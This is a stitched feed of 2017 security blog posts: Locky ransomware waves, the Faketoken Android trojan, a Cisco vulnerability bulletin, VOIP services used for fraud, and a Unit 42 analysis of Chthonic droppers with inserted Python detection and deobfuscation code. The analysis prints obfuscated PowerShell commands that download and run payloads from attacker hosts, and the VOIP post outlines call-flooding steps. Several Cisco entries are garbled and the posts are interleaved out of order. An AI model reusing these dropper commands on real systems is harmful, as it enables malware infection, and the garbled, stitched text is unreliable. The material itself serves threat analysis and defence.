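            groups[basename].add(host)
    return groups


def suspicious_paths(records: List[Record], min_hosts: int = 3) -> Dict[str, Set[str]]:
    """Paths fetched from at least `min_hosts` distinct hosts: the pattern of
    one payload name (jbYUF6D) or one C2 script (imageload.cgi) spread over
    many compromised or DGA domains."""
    return {p: hosts for p, hosts in group_by_basename(records).items()
            if len(hosts) >= min_hosts}


def dga_like(label: str) -> bool:
    """Weak lexical heuristic: few vowels or a long consonant run in the
    second-level label. It catches sorqjivpyfrwlo but misses dxeqiniexovy,
    which is why it is only a secondary signal here."""
    if len(label) < 8:
        return False
    vowels = sum(ch in "aeiou" for ch in label)
    runs = re.findall(r"[b-df-hj-np-tv-z]+", label)
    longest = max((len(r) for r in runs), default=0)
    return vowels / len(label) < 0.3 or longest >= 4


if __name__ == "__main__":
    recs = parse_log(SAMPLE_LOG)
    for path, hosts in suspicious_paths(recs).items():
        flagged = [h for h in hosts if dga_like(h.split(".")[0])]
        print(f"{path}: {len(hosts)} hosts, {len(flagged)} with DGA-like names")
```

In a real deployment the basename grouping needs an allowlist for names that legitimately occur everywhere (index.html, favicon.ico, robots.txt) and a time window, since the Locky waves described above fetch the same path from many hosts within minutes. The compromised legitimate sites hosting the payload (antwerpiastamps.be, for instance) are not DGA-like at all, which is exactly why the shared-path correlation is the stronger of the two checks.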

Once the files are downloaded and executed, they start scanning the user’s computer and encrypting system files, modifying their names with the following format:


After the encryption is done, Locky removes the downloaded executable and shows a ransom note – named lukitus.htm and lukitus.bmp – on the user’s display, explaining how to pay it and get the files back.

This is how a message with the Locky Lukitus Ransom Note appears on an infected computer display:

ransom note message

Source: Bleeping Computer

Although there are a number of decryption tools out there to unlock your data for free, this Locky ransomware Lukitus variant remains unbreakable, with no possibility of decrypting .lukitus files for free.

Initially, VirusTotal showed that 7 of 53 antivirus solutions were detecting this malicious file at the time it was posted. After a new and recent analysis, more engines (20 of 53 antivirus products) also identify this threat.

Source: VirusTotal

Here’s what you can do to protect from this new ransomware attack:

  • Backup, backup and backup again! Make sure you have at least 2 backups of your important data on external sources such as a hard drive or somewhere located in the cloud (Google Drive, Dropbox, etc.). This guide shows how to do it.
  • Update, update and update again! Once again, we remind users to install all the latest updates for their apps installed on the device, including the operating system.
  • Do not open, download email (messages) or click on suspicious links received from unknown sources that could infect your device.
  • Make sure you have a security software product (antivirus) that is updated or use a proactive security product to block access to infected domains or servers.

Ransomware attacks are on the rise and continue to appear in different forms. Once again, we remind you about the importance of being proactive and taking all needed security measures to protect your sensitive data.

*This article features cyber intelligence provided by CSIS Security Group researchers.

Author: Ioana Rijnetu

Taxi Trojans are on the way

You’re in a hurry, trying to get to work, a business meeting, a date. So you launch your favorite app for booking a taxi as usual, but this time, it prompts you to enter your credit card number. Does that seem suspicious? It may not — apps forget information, and all you have to do is add your card number again.

However, after some time you notice money disappearing from your account. What happened? You may be the unlucky winner of a mobile Trojan. This kind of malware has been caught recently stealing bank data by impersonating the interfaces of taxi-booking apps.

The Faketoken Trojan has existed for a long time, and it has been upgraded for many years. Our experts named the current version “Faketoken.q,” and by now it has learned a significant number of tricks.

After getting onto a smartphone (judging by the malware icon, Faketoken infiltrates smartphones through bulk SMS messages with a prompt to download some picture) and installing the necessary modules, the Trojan hides its shortcut icon and starts background monitoring of everything that happens in the system.

The icon of the installed Faketoken Trojan

First, the Trojan is interested in the user’s calls. As soon as it detects a call, it starts recording. When the call is finished, Faketoken sends the recording to the criminal’s server. Second, the Trojan also checks which apps the smartphone’s owner uses.

When Faketoken detects the launch of an app whose interface it can simulate, the Trojan immediately overlays the app with its own screen. To achieve that, it uses a standard Android feature that supports showing screen overlays on top of all other apps. A whole bunch of legitimate apps, such as messengers, window managers, and so on, use this feature.

The overlaying window matches the colors of the original app’s interface. In this window, the Trojan prompts the user to enter the number of his or her credit card, including the verification code from the back of the card.

The Faketoken.q Trojan impersonates taxi-booking apps popular in Russia

Actually, Faketoken.q is after a huge variety of apps that have one thing in common: in them, a request to enter payment data looks normal enough not to arouse suspicion. Among the attacked apps are a number of mobile banking apps, Android Pay, the Google Play Store, apps for booking flights and hotel rooms, and apps for paying traffic tickets — as well as apps for booking taxis.

At the actual stage of stealing money from the user, Faketoken resorts to another ruse: intercepting all incoming SMS messages, hiding them from the user, and forwarding them to the criminals’ server, where the one-time passwords for payment confirmation are extracted from those messages.

How banking Trojans bypass two-factor authentication

Judging by the small number of attacks that we have registered and the UI artifacts, which you can see in one of the screenshots above, we’d say the researchers at our antivirus laboratory got their hands on one of the test versions of the Trojan, not the final one.

We must give the assiduous creators of Faketoken their due. They will most likely improve the Trojan, and a wave of infection incidents may sprout from the “commercial” version at some point.

Currently the Trojan is focused on users in Russia, but as we’ve seen many times in the past, cybercriminals constantly steal ideas from each other, so it won’t take long for them to adopt the same trick in other countries. A lot of city dwellers have taxi-booking apps installed these days, so this trick represents a good opportunity for malware creators.

Below you can find several pieces of advice on how to protect yourself against Faketoken and similar mobile Trojans that steal card numbers and intercept SMS messages with one-time passwords used to confirm payments.

  • It is imperative that you go into Android’s settings and prohibit the installation of apps from unknown sources. To block installation from unknown sources, go to Settings -> Security and uncheck Unknown sources.

  • Always pay attention to what access permissions an app requests during installation, even if you downloaded it from Google Play (there might be Trojans in the official app store as well). You can learn more about Android permissions in this article.

Author: Alex Drozhzhin

New CISCO Security Bulletin

CISCO Security Bulletin 20170817-1200

CISCO Security Bulletin


CVE-2017-6790: Cisco TelePresence Video Communication Server Denial of Service Vulnerability
  • The vulnerability is due to excessive SIP traffic sent to the device. An attacker could exploit this vulnerability by transmitting large volumes of SIP traffic to the VCS. An exploit could allow the attacker to cause a complete DoS condition on the targeted system.
  • CSCve32897


CVE-2017-6785: Cisco Unified Communications Manager Horizontal Privilege Escalation
  • The vulnerability is due to lack of proper Role Based Access Control (RBAC) when certain user configuration changes are requested. An attacker could exploit this vulnerability by sending an authenticated, crafted HTTP request to the targeted application. An exploit could allow the attacker to impact the integrity of the application where one user can modify the configuration of another user’s information.
  • CSCve27331


CVE-2017-6767: Cisco Application Policy Infrastructure Controller Privilege Escalation Vulnerability
  • The vulnerability is due to a limitation with how Role-Based Access Control (RBAC) grants privileges to remotely authenticated users when login occurs via SSH directly to the local management interface of the APIC. An attacker could exploit this vulnerability by authenticating to the targeted device. The attacker’s privilege level will be modified to match that of the last user to log in via SSH. An exploit could allow the attacker to gain elevated privileges and perform CLI commands that should be restricted by the attacker’s configured role.
  • CSCvc34335


CVE-2017-6768: Cisco Application Policy Infrastructure Controller Custom Binary Privilege Escalation Vulnerability
  • The vulnerability is due to a custom executable system file that was built to use relative search paths for libraries without properly validating the library to be loaded. An attacker could exploit this vulnerability by authenticating to the device and loading a malicious library that can escalate the privilege level. A successful exploit could allow the attacker to gain root-level privileges and take full control of the device. The attacker must have valid user credentials to log in to the device.
  • CSCvc96087


CVE-2017-6710: Cisco Virtual Network Function Element Manager Arbitrary Command Execution Vulnerability
  • The vulnerability is due to command settings that allow Cisco VNF Element Manager users to specify arbitrary commands that will run as root on the server. An attacker could use this setting to elevate privileges and run commands in the context of the root user on the server.
  • CSCvc76670


CVE-2017-6771: Cisco Ultra Services Framework AutoVNF Configuration Information Disclosure Vulnerability
  • The vulnerability is due to insufficient protection of sensitive data. An attacker could exploit this vulnerability by browsing to a specific URL of an affected device. An exploit could allow the attacker to view sensitive configuration information about the deployment.
  • CSCvd29358


CVE-2017-6772: Cisco Elastic Services Controller (ESC) Configuration Files Information Disclosure Vulnerability
  • The vulnerability is due to insufficient protection of sensitive data. An attacker could exploit this vulnerability by authenticating to the application and navigating to certain configuration files. An exploit could allow the attacker to view sensitive system configuration files.
  • CSCvd29408


CVE-2017-6773: Cisco StarOS for ASR 5000 Series Routers Command Line Interface Security Bypass Vulnerability
  • The vulnerability is due to insufficient input sanitization of user-supplied input at the CLI. An attacker could exploit this vulnerability by crafting a script on the device that will allow them to bypass built-in restrictions. An exploit could allow the unauthorized user to launch the CLI directly from a command shell.
  • CSCvd47722


CVE-2017-6774: Series Routers FTP Configuration File Modification Vulnerability
  • The vulnerability is due to the inclusion of sensitive system files within specific FTP subdirectories. An attacker could exploit this vulnerability by overwriting sensitive configuration files through FTP. An exploit could allow the attacker to overwrite configuration files on an affected system.
  • CSCvd47739


CVE-2017-6775: Cisco StarOS for ASR 5000 Series Routers Privilege Escalation Vulnerability
  • The vulnerability is due to incorrect permissions that are given to a set of users. An attacker could exploit this vulnerability by logging in to the shell of an affected device and elevating their privileges by modifying environment variables. An exploit could allow the attacker to gain admin-level privileges and take control of the affected device.
  • CSCvd47741


CVE-2017-6776: Cisco Elastic Services Controller (ESC) Cross-Site Scripting Vulnerability
  • The vulnerability is due to insufficient validation of user-supplied input by the affected software. An attacker could exploit this vulnerability by convincing a user to access a malicious link or by intercepting a user request and injecting malicious code into the request. An exploit could allow the attacker to execute arbitrary script code in the context of the affected site or allow the attacker to access sensitive browser-based information.
  • CSCvd76324


CVE-2017-6777: Cisco Elastic Services Controller (ESC) Configuration Parameters Information Disclosure Vulnerability
  • The vulnerability is due to insufficient protection of sensitive files on the system. An attacker could exploit this vulnerability by logging into the ConfD server and executing certain commands. An exploit could allow an unprivileged user to view configuration parameters that can be maliciously used.
  • CSCvd76409


CVE-2017-6778: Cisco Ultra Services Platform Deployment Configuration Information Disclosure Vulnerability
  • The vulnerability is due to the transmission of sensitive information as part of a GET request. An attacker could exploit this vulnerability by sending a GET request to a vulnerable device. An exploit could allow the attacker to view information regarding the Ultra Services Platform deployment.
  • CSCvd76406


CVE-2017-6781: Cisco Policy Suite Privilege Escalation Vulnerability
  • To exploit this vulnerability, the attacker must log in to the appliance with valid credentials.
  • CSCve37724


CVE-2017-6783: Cisco Security Appliances SNMP Polling Information Disclosure Vulnerability
  • The vulnerability occurs because the appliances do not protect confidential information at rest in response to Simple Network Management Protocol (SNMP) poll requests. An attacker could exploit this vulnerability by doing a crafted SNMP poll request to the targeted security appliance. An exploit could allow the attacker to discover confidential information that should be restricted, and the attacker could use this information to conduct additional reconnaissance. The attacker must know the configured SNMP community string to exploit this vulnerability.
  • CSCve26106, CSCve26224, CSCve26202


CVE-2017-6784: Cisco RV34x Router Information Disclosure Vulnerability
  • The vulnerability is due to Cisco WebEx Meetings not sufficiently protecting sensitive data when responding to an HTTP request to the web interface. An attacker could exploit the vulnerability by attempting to use the HTTP protocol and looking at the data in the HTTP responses from the Cisco WebEx Meetings Server. An exploit could allow the attacker to find sensitive information about the application.
  • CSCve37988


CVE-2017-6782: lity
  • .
  • CSCve47074


CVE-2017-6786: Cisco Elastic Services Controller Sensitive Log Information Disclosure Vulnerability
  • The vulnerability is due to improper protection of sensitive log files. An attacker could exploit this vulnerability by logging in to an affected system and accessing unprotected log files. A successful exploit could allow the attacker to access sensitive log files, which may include system credentials, on the affected system.
  • CSCvc76616


CVE-2017-6788: Cisco AnyConnect WebLaunch Cross-Site Scripting Vulnerability
  • The vulnerability is due to insufficient input validation of some parameters that are passed to the WebLaunch function of the affected software. An attacker could exploit this vulnerability by convincing a user to access a malicious link or by intercepting a user request and injecting malicious code into the request.
  • CSCvf12055


Locky ransomware returns to the game with two new flavors

We recently observed a fresh malicious spam campaign pushed through the Necurs botnet, distributing, so far, two new variants of Locky ransomware.

In our last Q2 2017 report on tactics and techniques, we mentioned that Locky ransomware had reappeared with a new extension, but went dark again for months.

From August 9th, Locky made another reappearance using a new file extension “.diablo6” to encrypt files, with the rescue note “diablo6-[random].htm”.

Today a new Locky malspam campaign is pushing a new Locky variant that adds the extension “.Lukitus” and the rescue note “lukitus.html”.

Locky, like numerous other ransomware variants, is usually distributed with the help of spam emails containing a malicious Microsoft Office file or a ZIP attachment containing a malicious script.

The Locky variants call back to a different command and control (C2) server and use the affiliate IDs AffilID3 and AffilID5.

Over the last few months, Locky’s distribution has dropped drastically, at times stopping entirely, only to pop back up again, vanish and reappear once more.

The ups and downs of Locky remain shrouded in mystery. One thing time has taught us is that we should never assume Locky is gone simply because it’s not active at a particular given time.

Locky extension history

Active Campaigns:

  • Aug-09: MalSpam attached .zip with .vbs malware.
     VBS: 4c1975295603dbb3994627a499416b71
     Payload: 0d0823d9a5d000b80e27090754f59ee5
  • Aug-11: MalSpam attached PDF with embedded .DOCM files.
     PDF: 84fd7ba91a587cbf8e20d0f2d5fda285
     DOC: 97414e16331df438b2d7da0dad75a8d5
     Payload: 9dcdfbb3e8e4020e4cf2fc77e86daa76
  • Aug-14: MalSpam attached RAR with .JS malware.
     JS: badea58f10d5d2bb242962e3c47ff472
     Exe: 6b4221adf0ecb55cd1a4810330b4e1e4
  • Aug-15: MalSpam attached ZIP with .JS malware.
     JS: 5f1af4f2702a6bc7f5250c9879487f66
     Exe: 89ed8780cae257293f610817d6bf1a2e
  • Aug-16: MalSpam attached ZIP with .JS malware.
     JS: f2c97bd1793ff93073bfde61d12f482b
     Exe: 4baa57a08c90b78d16c634c22385a748


Malwarebytes protects against this attack at various layers including macro and ransomware mitigation, and neither of those required any signature update.


The post Locky ransomware returns to the game with two new flavors appeared first on Malwarebytes Labs.

Author: Marcelo Rivero

VOIP Services Utilized for Fraud Proliferate Across Russian-Language Underground

One barrier to online fraud is that some transactions require a phone call – either made or received – for confirmation. While this measure has long presented a significant hurdle to criminals attempting to make online purchases using compromised bank or online retail accounts, it appears to be becoming less and less effective as a security measure. Indeed, some criminals have recently demonstrated their ability to bypass this type of telephone verification to make fraudulent online transactions by leveraging various Voice over Internet Protocol (VOIP) services.

Flashpoint has recently observed three VOIP services in particular that have been gaining traction among Russian-speaking cybercriminals seeking to make fraudulent online transactions:


A previously private VOIP service named “Narayana” – a Sanskrit term meaning “an individual who offers sanctuary” – was first advertised on two different Russian-language cybercriminal forums in the first quarter of 2017. According to an advertisement, Narayana boasts the following features:

  • Supports Session Initiation Protocol (SIP), a protocol that defines elements of telephone calls and multimedia communication sessions made over IP networks, allowing any smartphone, computer, or IP telephone to use the service
  • SIM cards based on the GSM (Global System for Mobile communication) standard for almost any country on earth, allowing phone calls and Internet access
  • Free iNum number for each user. iNum is a platform for making free international calls between numbers within the network
  • Creation of a virtual number for receiving calls and SMS messages in more than ten different countries
  • Extended inbound call routing through Direct Inward Dialing (DID)
  • Availability of “pitch shifting,” which shifts the tone of the speaker’s voice
  • Ability to redirect and respond to incoming SMS messages on Jabber (XMPP)
  • Assurance that no customer personal data is saved, including IP addresses or user-agent information
  • Ability to block third parties, including roaming partners, from seeing any call information
  • Options for making inexpensive phone calls from Russia to the U.S. with reduced audio to confirm transactions and transfers made with compromised payment information
  • Support for forced TLS (Transport Layer Security) and SRTP (Secure Real-time Transport Protocol) encryption during SIP calls to prevent traffic interception

Much of Narayana’s appeal among Russian-speaking cybercriminals also stems from its ease of use and affordability. Upon registering an account with Narayana’s website, users are assigned phone numbers as well as login credentials for the service’s SIP server, where caller ID configurations can be altered. The cost of renting a virtual number varies by country but begins at 10 euro per month; purchasing an international SIM card through the service costs 30 euro.

Image 1: The personal information page for a Narayana user; overlaid text is Flashpoint’s translation.


Another VOIP service called SIP24 was first advertised on an elite Russian-language cybercrime forum in June 2016. Although SIP24 and Narayana have similar features and functionality, SIP24 is available by invitation only, has reportedly higher call quality, and has additional features and restrictions aimed to bolster security. Specifically, SIP24 has banned caller IDs displaying Russian numbers for both domestic and international calls; the service also encourages the complementary use of freeware “Zoiper” to further enhance security and anonymity.

SIP Killer

SIP Killer is another VOIP service that has been discussed on and off for several years on various Russian-language cybercrime forums, as well as on AlphaBay prior to the market’s takedown. SIP Killer is used primarily to enable “call-flooding” — a tactic where criminals send high volumes of call traffic over a VOIP service in an effort to render a particular call service unavailable.

In fact, in December 2016, a well-known member of a Russian-language hacking forum offered a popular tutorial on how to carry out call-flooding attacks via SIP Killer. According to this individual, all a user needs to do is register ten to fifteen accounts on the website “Zadamra,” then click the “Settings” tab and then “SIP settings.” After entering login data, the SIP Killer is launched and the user can carry out call-flooding for a variety of malicious ends, including preventing the call verification of fraudulent orders. The goal is to overload a victim’s telephone with so many calls that legitimate calls — such as those seeking to verify or inform a victim of an online order or transaction — become “buried” and go unnoticed, or never make it through to the intended recipient.


Given cybercriminals’ longstanding interest in online transaction fraud and widespread determination to circumvent anti-fraud protections, VOIP services that enable users to rent virtual phone numbers and purchase SIM cards for countries around the world will likely continue to proliferate throughout the Deep & Dark Web, and it is important to recognize that instances of online transaction fraud have the potential to increase as a result. This information is especially relevant for financial institutions and e-commerce retailers, many of which may be unable to differentiate between legitimate transaction confirmation calls and fraudulent ones made and/or received by criminals using VOIP services.

The post VOIP Services Utilized for Fraud Proliferate Across Russian-Language Underground appeared first on Flashpoint.

Author: Justin Rogers

The Curious Case of Notepad and Chthonic: Exposing a Malicious Infrastructure

Recently, I’ve been investigating malware utilizing PowerShell and have spent a considerable amount of time refining ways to identify new variants of attacks as they appear. This posting is a follow-up to my previous work on this subject in “Pulling Back the Curtains on EncodedCommand PowerShell Attacks”.

In a sample I recently analyzed, something stood out as extremely suspicious which led me down a rabbit hole, uncovering malicious infrastructure supporting Chthonic, Nymaim, and other malware and malicious websites.

Throughout this blog post I present my analysis and thought process during this research, but if you would just like a list of the findings, they are over on our Unit42 GitHub.

One of these things is not like the others…

Most commonly, PowerShell is launched from a Microsoft Office document that uses a VBA macro to launch PowerShell to perform something malicious – typically downloading the “real” malware to run. I focused my hunting on the PowerShell activity with Palo Alto Networks AutoFocus to determine whether it’s worth digging into further based on “uniqueness” and functionality.

In this case, the first sample I looked at stood out for another reason entirely. If you take a look at the below PowerShell, you’ll quickly understand why.

<null> , cMd.exe /c "p^Ow^ERS^hel^l^.e^x^e^ -nO^l -No^Ni^Nt^ -W^InDO^ws^ 1 -NoprO^FIle^ -eX^Ec^U B^Ypa^S^s $fos=''',''';$hit='dfil';$fd=');sta';$dr='(ne';$ed='ject ';$ipo='syst';$kos='t.we';$rem='ent).do';$sad='wnloa';$kp='w-ob';$nim='e(''';$mo='%ap';$uy='pdat';$ji='a%.ex';$pol='em.ne';$oe='e''';$jik='rt-pro';$naw='cess ''';$lim='bcli';Invoke-Expression($dr+$kp+$ed+$ipo+$pol+$kos+$lim+$rem+$sad+$hit+$nim+'https://notepad-plus-plus[.]org/repository/7.x/7.4.2/npp.7.4.2.Installer.exe'+$fos+$mo+$uy+$ji+$oe+$fd+$jik+$naw+$mo+$uy+$ji+$oe)"

This code downloads a file from the legitimate Notepad++ website. My initial thought was the worst-case scenario – they’ve been compromised and are distributing malware! I immediately downloaded the file from the website, but everything looked normal. Of course, I had to investigate further.

The sample stayed true to the previous outline I laid out for these attacks: the Microsoft Excel document appeared to be a lure about financial information, specifically a VAT invoice written in Polish as shown below.


Looking under the hood, we see the VBA code that builds the PowerShell command and launches it, but something seemed off. There are a ton of functions that are clearly decoding information from arrays, after which it executes an already decoded PowerShell command. I decided to debug the macro and see exactly what it’s doing before I made any decisions.


If you look at the above image, there are five things to note.

1. The variable ‘horrorr’ (double ‘r’) is the result of all of the previously mentioned decoding functions. This builds a PowerShell command.

2. You can see ‘Shelleeeee horrorr, 0’ commented out; I believe this was intended to launch the previous PowerShell command.

3. The ‘Debug.Print horrorr’ prints the content of that variable in the ‘Immediate’ area shown in the screenshot. The domain in this command is NOT ‘notepad-plus-plus.org’ and can be seen below.

cMd.exe   /c "p^Ow^ERS^hel^l^.e^x^e^  -nO^l -No^Ni^Nt^  -W^InDO^ws^ 1 -NoprO^FIle^  -eX^Ec^U  B^Ypa^S^s $fos=''',''';$hit='dfil';$fd=');sta';$dr='(ne';$ed='ject ';$ipo='syst';$kos='t.we';$rem='ent).do';$sad='wnloa';$kp='w-ob';$nim='e(''';$mo='%ap';$uy='pdat';$ji='a%.ex';$pol='em.ne';$oe='e''';$jik='rt-pro';$naw='cess ''';$lim='bcli';Invoke-Expression($dr+$kp+$ed+$ipo+$pol+$kos+$lim+$rem+$sad+$hit+$nim+'https://farhenzel[.]co/gls.exe'+$fos+$mo+$uy+$ji+$oe+$fd+$jik+$naw+$mo+$uy+$ji+$oe)"

4. The ‘MsgBox’ will pop up and not display anything, because the variable passed is ‘horror’ (one ‘r’) along with the message ‘Do you really think I’m not a virus?’ in Polish.

5. The hard coded PowerShell command with ‘notepad-plus-plus.org’ will run.

The most likely conclusion that can be drawn here is that an analyst or researcher obtained this file, modified it to see the content (misspelling the variable name along the way) post-decoding, and uploaded it to see what it did in a sandbox. To be sure though, I needed to find other samples and see how they stacked up against this one.

Going back to the PowerShell command, the initial reason I stopped to look at it was due to the way they concatenated variables to form the download command and output. This also provides a perfect pivot point to hunt for samples. Using the below string to search Process Activity in AutoFocus revealed 171 samples.


The dates were all fairly recent, having been received in the past few days since the beginning of August. The documents shared the same themes for lures but the VBA macro and resulting PowerShell were more along the lines of what I expected.

For sample “538ff577a80748d87b5e738e95c8edd2bd54ea406fe3a75bf452714b17528a87” the following is an excerpt from the VBA macro building the PowerShell command.

tntcurier = "$fos=''" + "',''';$hit='df" + "il';$fd=');sta';$dr='(ne';$ed" + "='ject '" + ";$ipo='syst';$kos='t.we';$rem='ent).do';$sad"
tntcurier = tntcurier + "='wn" + "l" + "oa';$kp" + "='w-" + "ob'" + ";$nim='e(''" + "';$mo='" + cautrunova(2) + "';$" + "uy='" + cautrunova(2) + "';$ji" + "='" + cautrunova(2) + ".e" + "x';$po" + "l='em." + "ne';$oe='e''';$jik='rt-p" + "ro';$naw='c" + "ess ''';$lim='bc" + "li';I" + "nv" + "oke-E" + "xp" + "ression($dr+$kp+$ed+$ipo+$pol+$kos+$lim+$rem+$sad+$hit+$nim+'h" + "t" + "t" + "ps:" + "//naiillad." + "dat" + "e/u" + "3." + poro + "xe" + "'+$fos+$mo+$uy+$ji+$oe+$fd+$jik+$naw+$mo+$uy+$ji+$oe)"

Along with the subsequent Process Activity using the newly built PowerShell command, which aligns with what was commented out of the first sample analyzed.

WindowsSysWOW64cmd.exe , cMD.exe /c "p^Ow^ERS^hel^l^.e^x^e^ -nO^l -No^Ni^Nt^ -W^InDO^ws^ 1 -NoprO^FIle^ -eX^Ec^U B^Ypa^S^s $fos=''',''';$hit='dfil';$fd=');sta';$dr='(ne';$ed='ject ';$ipo='syst';$kos='t.we';$rem='ent).do';$sad='wnloa';$kp='w-ob';$nim='e(''';$mo='tt';$uy='lf';$ji='qo.ex';$pol='em.ne';$oe='e''';$jik='rt-pro';$naw='cess ''';$lim='bcli';Invoke-Expression($dr+$kp+$ed+$ipo+$pol+$kos+$lim+$rem+$sad+$hit+$nim+'https://naiillad[.]date/u3.exe'+$fos+$mo+$uy+$ji+$oe+$fd+$jik+$naw+$mo+$uy+$ji+$oe)"
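The cmd.exe caret mangling and the $var-concatenation builder in the three command lines above can be undone mechanically, which is also how the download URL and drop path can be pulled out of process logs at scale. The following is an added example, not code from the post or from Unit 42: the two sample command lines are constructed from the page’s own samples (URLs kept defanged with [.] as printed), and every function name and regex is the example’s own.

```python
"""Recover the download command hidden behind cmd.exe caret escapes and the
PowerShell string-concatenation trick seen in the process activity above.

Added example, not code from the original post: the SAMPLE_* command lines are
constructed from the page's samples (URLs kept defanged with [.]), and all
regexes and function names are this example's own.
"""
import re
from typing import Dict, Optional

# Constructed from the notepad-plus-plus sample above (output path %appdata%.exe).
SAMPLE_NOTEPAD = (
    'cMd.exe /c "p^Ow^ERS^hel^l^.e^x^e^ -nO^l -No^Ni^Nt^ -W^InDO^ws^ 1 '
    "-NoprO^FIle^ -eX^Ec^U B^Ypa^S^s $fos=''',''';$hit='dfil';$fd=');sta';"
    "$dr='(ne';$ed='ject ';$ipo='syst';$kos='t.we';$rem='ent).do';$sad='wnloa';"
    "$kp='w-ob';$nim='e(''';$mo='%ap';$uy='pdat';$ji='a%.ex';$pol='em.ne';"
    "$oe='e''';$jik='rt-pro';$naw='cess ''';$lim='bcli';Invoke-Expression($dr+$kp"
    "+$ed+$ipo+$pol+$kos+$lim+$rem+$sad+$hit+$nim+'https://notepad-plus-plus[.]org"
    "/repository/7.x/7.4.2/npp.7.4.2.Installer.exe'+$fos+$mo+$uy+$ji+$oe+$fd+$jik"
    '+$naw+$mo+$uy+$ji+$oe)"'
)
# Constructed from the naiillad[.]date sample above (output path ttlfqo.exe).
SAMPLE_NAIILLAD = (
    'cMD.exe /c "p^Ow^ERS^hel^l^.e^x^e^ -nO^l -No^Ni^Nt^ -W^InDO^ws^ 1 '
    "-NoprO^FIle^ -eX^Ec^U B^Ypa^S^s $fos=''',''';$hit='dfil';$fd=');sta';"
    "$dr='(ne';$ed='ject ';$ipo='syst';$kos='t.we';$rem='ent).do';$sad='wnloa';"
    "$kp='w-ob';$nim='e(''';$mo='tt';$uy='lf';$ji='qo.ex';$pol='em.ne';$oe='e''';"
    "$jik='rt-pro';$naw='cess ''';$lim='bcli';Invoke-Expression($dr+$kp+$ed+$ipo"
    "+$pol+$kos+$lim+$rem+$sad+$hit+$nim+'https://naiillad[.]date/u3.exe'+$fos"
    '+$mo+$uy+$ji+$oe+$fd+$jik+$naw+$mo+$uy+$ji+$oe)"'
)

# $name='value' (PowerShell escapes a quote inside '...' as ''); one operand token.
PS_ASSIGN = re.compile(r"\$(\w+)='((?:[^']|'')*)'")
PS_TOKEN = re.compile(r"\$\w+|'(?:[^']|'')*'")
IEX_ARG = re.compile(r"Invoke-Expression\s*\((.*)\)", re.I | re.S)


def strip_carets(cmdline: str) -> str:
    """cmd.exe treats ^ as an escape for the following character, so the text the
    child process actually receives is the line with each ^X collapsed to X."""
    return re.sub(r"\^(.)", r"\1", cmdline, flags=re.S)


def normalize_launcher(cmdline: str) -> str:
    """Lower-cased powershell.exe invocation up to the first $var= assignment, so
    the switches can be matched regardless of case mangling."""
    m = re.search(r"powershell\.exe.*?(?=\s+\$\w+=)", strip_carets(cmdline), re.I)
    return m.group(0).lower() if m else ""


def parse_assignments(ps: str) -> Dict[str, str]:
    """Map of variable name -> literal value, with PowerShell's '' unescaped."""
    return {n.lower(): v.replace("''", "'") for n, v in PS_ASSIGN.findall(ps)}


def reconstruct_invoke_expression(ps: str) -> Optional[str]:
    """Join the Invoke-Expression(...) operands the way PowerShell's + would."""
    m = IEX_ARG.search(ps)
    if not m:
        return None
    variables = parse_assignments(ps)
    parts = []
    for tok in PS_TOKEN.findall(m.group(1)):
        if tok.startswith("$"):
            parts.append(variables.get(tok[1:].lower(), tok))  # unknown var: keep
        else:
            parts.append(tok[1:-1].replace("''", "'"))
    return "".join(parts)


def concat_score(cmdline: str) -> int:
    """Number of $var operands inside Invoke-Expression(); the samples above use
    over twenty, which makes a cheap hunting heuristic for this builder."""
    m = IEX_ARG.search(strip_carets(cmdline))
    return len(re.findall(r"\$\w+", m.group(1))) if m else 0


def analyze(cmdline: str) -> Dict[str, Optional[str]]:
    """Full pipeline: de-caret, rebuild the expression, pull out URL and path."""
    decoded = reconstruct_invoke_expression(strip_carets(cmdline))
    url = dest = None
    if decoded:
        m = re.search(r"downloadfile\('([^']*)','([^']*)'\)", decoded, re.I)
        if m:
            url, dest = m.group(1), m.group(2)
    return {"launcher": normalize_launcher(cmdline), "decoded": decoded,
            "url": url, "dest": dest}


if __name__ == "__main__":
    for sample in (SAMPLE_NOTEPAD, SAMPLE_NAIILLAD):
        result = analyze(sample)
        print(f"score={concat_score(sample)} url={result['url']} dest={result['dest']}")
        print(result["decoded"])
```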

Given this, I iterated over all 171 samples and extracted the following URLs from which PowerShell downloads a payload.


Pass the Chthonic

Going back to the Process Activity, we can see the SHA256 value of each downloaded file and compile a list of hashes for further pivoting as shown below.


After iterating over the 171 samples, we’re left with this list of hashes for the downloaded files. Note that there are fewer payloads than there are samples, indicating many of the documents download the same payload.

Below is a table with the compile date and some PDB strings found within a few of the binaries. Most of the compile times are within the past two months, with 6 in August and a couple from as recently as two days ago at the time of this writing.

SHA256 Compile Date PDB String
29c7740f487a461a96fad1c8db3921ccca8cc3e7548d44016da64cf402a475ad 2016-12-10 01
d5e56b9b5f52293b209a60c2ccd0ade6c883f9d3ec09571a336a3a4d4c79134b 2016-12-10 03 C:RAMDriveCharlesheavenreamsTeac.pdb
dd5f237153856d19cf20e80ff8238ca42047113c44fae27b5c3ad00be2755eea 2016-12-10 16 C:CleaneramuserangAutoPopulatela.pdb
a5001e9b29078f532b1a094c8c16226d20c03922e37a4fca2e9172350bc160a0 2016-12-20 18
8284ec768a06b606044defe2c2da708ca6b3b51f8e58cb66f61bfca56157bc88 2017-07-05 10
f0ce51eb0e6c33fdb8e1ccb36b9f42139c1dfc58d243195aedc869c7551a5f89 2017-07-09 20 C:TableAdapterencyclopediaParik.pdb
145d47f4c79206c6c9f74b0ab76c33ad0fd40ac6724b4fac6f06afec47b307c6 2017-07-10 08 C:ayakhninreprductivedistortedc.pdb
dc8f34829d5fede991b478cf9117fb18c32d639573a827227b2fc50f0b475085 2017-07-11 01 C:positioningscrappingSzetsthi.pdb
7fe1069c118611113b4e34685e7ee58cb469bda4aa66a22db10842c95f332c77 2017-07-11 02 C:NeXTvolatilelegacyExchangeDNs.pdb
5edf117e7f8cd176b1efd0b5fd40c6cd530699e7a280c5c7113d06e9c21d6976 2017-07-12 23
2a80fdda87127bdc56fd35c3e04eb64a01a159b7b574177e2e346439c97b770a 2017-07-13 00
a9021e253ae52122cbcc2284b88270ceda8ad9647515d6cca96db264a76583f5 2017-07-18 00
dd639d76ff6f33bbfaf3bd398056cf4e95e27822bd9476340c7703f5b38e0183 2017-07-18 00
e5a00b49d4ab3e5a3a8f60278b9295f3d252e3e04dadec2624bb4dcb2eb0fada 2017-07-24 17
6263730ef54fbed0c2d3a7c6106b6e8b12a6b2855a03e7caa8fb184ed1eabeb2 2017-07-24 22 C:SnapshotDiskettehidingROCKMA.pdb
